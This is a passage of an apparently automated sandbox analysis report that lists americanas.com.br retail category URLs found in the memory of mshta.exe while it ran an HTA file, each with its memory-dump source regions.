00000000.00000003.537412593.00000000079F2000.00000004.00000020.00020000.00000000.sdmp, Archivo-PxFkiLTWYG-23122024095010.htaString found in binary or memory: https://www.americanas.com.br/categoria/informatica/notebooks-gamer?chave=pfm_hm_tt_1_0_notebook-gam
Source: mshta.exe, 00000000.00000003.515835386.00000000046E0000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484385350.00000000065C0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537518423.0000000007AE3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539475394.0000000007AE7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484406392.0000000007A52000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539726653.00000000043D6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537786668.00000000043C1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537630543.0000000005DAE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537412593.00000000079F2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.538457983.0000000005172000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539528256.0000000005D8E000.00000004.00000020.00020000.00000000.sdmp, Archivo-PxFkiLTWYG-23122024095010.htaString found in binary or memory: https://www.americanas.com.br/categoria/informatica/notebooks?chave=dk_hm_at_notebooks
Source: mshta.exe, 00000000.00000003.484305682.0000000005378000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.americanas.com.br/categoria/informatica/notebooks?chave=dk_hm_at_notebooksmeta.largemeta
Source: mshta.exe, 00000000.00000003.538850057.0000000005165000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484385350.00000000065C0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537518423.0000000007AE3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539754578.0000000005D49000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.548679681.0000000005D1D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539475394.0000000007AE7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484406392.0000000007A52000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.538835391.0000000005158000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537412593.00000000079F2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.541042280.0000000005D1D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.538457983.00000000051B8000.00000004.00000020.00020000.00000000.sdmp, Archivo-PxFkiLTWYG-23122024095010.htaString found in binary or memory: https://www.americanas.com.br/categoria/informatica/notebooks?chave=pfm_hm_tt_1_0_notebook
Source: mshta.exe, 00000000.00000003.515835386.00000000046E0000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.538850057.0000000005165000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539805523.0000000005166000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484385350.00000000065C0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537518423.0000000007AE3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539754578.0000000005D49000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539475394.0000000007AE7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484354237.0000000000C91000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537630543.0000000005DF6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484324614.0000000000C90000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484406392.0000000007A52000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.538835391.0000000005158000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537412593.00000000079F2000.00000004.00000020.00020000.00000000.sdmp, Archivo-PxFkiLTWYG-23122024095010.htaString found in binary or memory: https://www.americanas.com.br/categoria/informatica/tablet-e-ipad/tablet?chave=pfm_hm_tt_1_0_tablet
Source: mshta.exe, 00000000.00000003.538850057.0000000005165000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484385350.00000000065C0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537518423.0000000007AE3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539754578.0000000005D49000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537630543.0000000005E1A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.538952952.00000000006D3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539475394.0000000007AE7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484406392.0000000007A52000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.538835391.0000000005158000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537412593.00000000079F2000.00000004.00000020.00020000.00000000.sdmp, Archivo-PxFkiLTWYG-23122024095010.htaString found in binary or memory: https://www.americanas.com.br/categoria/informatica?chave=pfm_hm_tt_1_0_informatica
Source: mshta.exe, 00000000.00000003.515835386.00000000046E0000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484385350.00000000065C0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539149198.000000000514B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539161574.0000000005152000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537518423.0000000007AE3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537630543.0000000005E1A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.540586764.0000000007943000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.548308733.0000000007943000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539475394.0000000007AE7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484406392.0000000007A52000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484369993.0000000000C5E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539726653.00000000043D6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537786668.00000000043C1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537412593.00000000079F2000.00000004.00000020.00020000.00000000.sdmp, Archivo-PxFkiLTWYG-23122024095010.htaString found in binary or memory: https://www.americanas.com.br/categoria/informatica?chave=pfm_home_informatica_menu
Source: mshta.exe, 00000000.00000003.535486328.0000000005344000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.535351898.0000000005337000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.535471671.000000000533C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.americanas.com.br/categoria/informatica?chave=pfm_home_informatica_menuhttps://www.ameri
Source: mshta.exe, 00000000.00000003.515835386.00000000046E0000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.538457983.000000000517C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484385350.00000000065C0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537518423.0000000007AE3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539754578.0000000005D49000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539475394.0000000007AE7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484354237.0000000000C91000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484324614.0000000000C90000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484406392.0000000007A52000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539173540.0000000005185000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.538835391.0000000005158000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537412593.00000000079F2000.00000004.00000020.00020000.00000000.sdmp, Archivo-PxFkiLTWYG-23122024095010.htaString found in binary or memory: https://www.americanas.com.br/categoria/instrumentos-musicais?chave=pfm_home_instrumentos_menu
Source: mshta.exe, 00000000.00000003.515835386.00000000046E0000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484385350.00000000065C0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537518423.0000000007AE3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539475394.0000000007AE7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484406392.0000000007A52000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539726653.00000000043D6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.540463831.0000000007969000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537786668.00000000043C1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537412593.00000000079F2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539528256.0000000005D8E000.00000004.00000020.00020000.00000000.sdmp, Archivo-PxFkiLTWYG-23122024095010.htaString found in binary or memory: https://www.americanas.com.br/categoria/livros?chave=dk_hm_at_livros
Source: mshta.exe, 00000000.00000003.484305682.0000000005378000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.americanas.com.br/categoria/livros?chave=dk_hm_at_livrosmeta.largemeta.large.heightmeta.
Source: mshta.exe, 00000000.00000003.515835386.00000000046E0000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.538457983.000000000517C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484385350.00000000065C0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537518423.0000000007AE3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539754578.0000000005D49000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539475394.0000000007AE7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484354237.0000000000C91000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484324614.0000000000C90000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484406392.0000000007A52000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539173540.0000000005185000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.535351898.0000000005337000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.538835391.0000000005158000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537412593.00000000079F2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.535609575.000000000533A000.00000004.00000800.00020000.00000000.sdmp, Archivo-PxFkiLTWYG-23122024095010.htaString found in binary or memory: https://www.americanas.com.br/categoria/livros?chave=pfm_home_livros_menu
Source: mshta.exe, 00000000.00000003.515835386.00000000046E0000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484385350.00000000065C0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537518423.0000000007AE3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539754578.0000000005D49000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539475394.0000000007AE7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484354237.0000000000C91000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484324614.0000000000C90000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484406392.0000000007A52000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.538835391.0000000005158000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537412593.00000000079F2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.535486328.000000000534B000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.535351898.000000000534B000.00000004.00000800.00020000.00000000.sdmp, Archivo-PxFkiLTWYG-23122024095010.htaString found in binary or memory: https://www.americanas.com.br/categoria/malas-mochilas-e-acessorios?chave=pfm_home_malas_menu
Source: mshta.exe, 00000000.00000003.515835386.00000000046E0000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.538457983.000000000517C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484385350.00000000065C0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537518423.0000000007AE3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539754578.0000000005D49000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.538862819.000000000515E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539805523.000000000515F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539475394.0000000007AE7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484354237.0000000000C91000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484324614.0000000000C90000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484406392.0000000007A52000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539173540.0000000005185000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.538835391.0000000005158000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537412593.00000000079F2000.00000004.00000020.00020000.00000000.sdmp, Archivo-PxFkiLTWYG-23122024095010.htaString found in binary or memory: https://www.americanas.com.br/categoria/mercado/alimentos?chave=pc_cat_menu_mercearia_mercado
Source: mshta.exe, 00000000.00000003.515835386.00000000046E0000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.535457179.0000000005336000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484385350.00000000065C0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537518423.0000000007AE3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539754578.0000000005D49000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.540237396.0000000000759000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.538862819.000000000515E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539805523.000000000515F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539173540.00000000051D3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539475394.0000000007AE7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484406392.0000000007A52000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.538835391.0000000005158000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537412593.00000000079F2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.538243144.0000000000743000.00000004.00000020.00020000.00000000.sdmp, Archivo-PxFkiLTWYG-23122024095010.htaString found in binary or memory: https://www.americanas.com.br/categoria/mercado/bebes?chave=pc_cat_menu_bebes_mercado
Source: mshta.exe, 00000000.00000003.515835386.00000000046E0000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484385350.00000000065C0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537518423.0000000007AE3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539754578.0000000005D49000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539475394.0000000007AE7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484406392.0000000007A52000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539726653.00000000043D6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537786668.00000000043C1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537412593.00000000079F2000.00000004.00000020.00020000.00000000.sdmp, Archivo-PxFkiLTWYG-23122024095010.htaString found in binary or memory: https://www.americanas.com.br/categoria/mercado/bebidas/bebidas-alcoolicas/vinho
Source: mshta.exe, 00000000.00000003.515835386.00000000046E0000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484385350.00000000065C0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537518423.0000000007AE3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539754578.0000000005D49000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.538862819.000000000515E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539805523.000000000515F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539173540.00000000051D3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539475394.0000000007AE7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484354237.0000000000C91000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484324614.0000000000C90000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484406392.0000000007A52000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.538835391.0000000005158000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537412593.00000000079F2000.00000004.00000020.00020000.00000000.sdmp, Archivo-PxFkiLTWYG-23122024095010.htaString found in binary or memory: https://www.americanas.com.br/categoria/mercado/bebidas/bebidas-alcoolicas?chave=pc_cat_menu_bebidas
Source: mshta.exe, 00000000.00000003.515835386.00000000046E0000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.538457983.000000000517C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484385350.00000000065C0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537518423.0000000007AE3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539754578.0000000005D49000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.538862819.000000000515E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539475394.0000000007AE7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484354237.0000000000C91000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484324614.0000000000C90000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484406392.0000000007A52000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.538835391.0000000005158000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537412593.00000000079F2000.00000004.00000020.00020000.00000000.sdmp, Archivo-PxFkiLTWYG-23122024095010.htaString found in binary or memory: https://www.americanas.com.br/categoria/mercado/bebidas/bebidas-nao-alcoolicas?chave=pc_cat_menu_beb
Source: mshta.exe, 00000000.00000003.537786668.0000000004494000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.515835386.00000000046E0000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484385350.00000000065C0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537518423.0000000007AE3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.548436103.0000000004494000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.540937966.0000000004494000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539475394.0000000007AE7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484406392.0000000007A52000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539726653.00000000043D6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537786668.00000000043C1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537412593.00000000079F2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539528256.0000000005D8E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539662366.0000000004494000.00000004.00000020.00020000.00000000.sdmp, Archivo-PxFkiLTWYG-23122024095010.htaString found in binary or memory: https://www.americanas.com.br/categoria/mercado/bebidas?chave=dk_hm_at_bebidas
Source: mshta.exe, 00000000.00000003.484305682.0000000005378000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.americanas.com.br/categoria/mercado/bebidas?chave=dk_hm_at_bebidasmeta.largemeta.large.h
Source: mshta.exe, 00000000.00000003.515835386.00000000046E0000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.538457983.000000000517C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484385350.00000000065C0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539149198.000000000514B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537518423.0000000007AE3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539754578.0000000005D49000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.548511611.000000000514C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.538862819.000000000515E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539805523.000000000515F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539475394.0000000007AE7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484354237.0000000000C91000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484324614.0000000000C90000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484406392.0000000007A52000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539173540.0000000005185000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.538835391.0000000005158000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537412593.00000000079F2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539906624.000000000514C000.00000004.00000020.00020000.00000000.sdmp, Archivo-PxFkiLTWYG-23122024095010.htaString found in binary or memory: https://www.americanas.com.br/categoria/mercado/bomboniere?chave=pc_cat_menu_bombiniere_mercado
Source: mshta.exe, 00000000.00000003.515835386.00000000046E0000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484385350.00000000065C0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537518423.0000000007AE3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539754578.0000000005D49000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.535449726.0000000005307000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539475394.0000000007AE7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.535199624.0000000005307000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484406392.0000000007A52000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.538835391.0000000005158000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.535630387.0000000005308000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537412593.00000000079F2000.00000004.00000020.00020000.00000000.sdmp, Archivo-PxFkiLTWYG-23122024095010.htaString found in binary or memory: https://www.americanas.com.br/categoria/mercado?chave=pc_cat_home_depart_mercado
Source: mshta.exe, 00000000.00000003.515835386.00000000046E0000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.538457983.000000000517C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484385350.00000000065C0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537518423.0000000007AE3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539754578.0000000005D49000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.540586764.0000000007943000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.538862819.000000000515E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.548308733.0000000007943000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539475394.0000000007AE7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484354237.0000000000C91000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484324614.0000000000C90000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484406392.0000000007A52000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539173540.0000000005185000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.538835391.0000000005158000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537412593.00000000079F2000.00000004.00000020.00020000.00000000.sdmp, Archivo-PxFkiLTWYG-23122024095010.htaString found in binary or memory: https://www.americanas.com.br/categoria/mercado?chave=pc_cat_menu_mercado
Source: mshta.exe, 00000000.00000003.515835386.00000000046E0000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484385350.00000000065C0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537518423.0000000007AE3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539754578.0000000005D49000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.535449726.0000000005307000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.535589591.0000000005309000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539475394.0000000007AE7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.535199624.0000000005307000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484354237.0000000000C91000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.540201462.0000000005D2C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484324614.0000000000C90000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484406392.0000000007A52000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.540858944.0000000005D33000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.538835391.0000000005158000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539805523.0000000005159000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537412593.00000000079F2000.00000004.00000020.00020000.00000000.sdmp, Archivo-PxFkiLTWYG-23122024095010.htaString found in binary or memory: https://www.americanas.com.br/categoria/moda?chave=pfm_home_moda_menu
Source: mshta.exe, 00000000.00000003.538977020.00000000006D9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.515835386.00000000046E0000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.538457983.000000000517C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484385350.00000000065C0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537518423.0000000007AE3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539754578.0000000005D49000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.538952952.00000000006D3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539475394.0000000007AE7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484354237.0000000000C91000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484324614.0000000000C90000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484406392.0000000007A52000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537412593.00000000079F2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.538243144.0000000000743000.00000004.00000020.00020000.00000000.sdmp, Archivo-PxFkiLTWYG-23122024095010.htaString found in binary or memory: https://www.americanas.com.br/categoria/moveis/cama?chave=pfm_hm_tt_1_0_cama
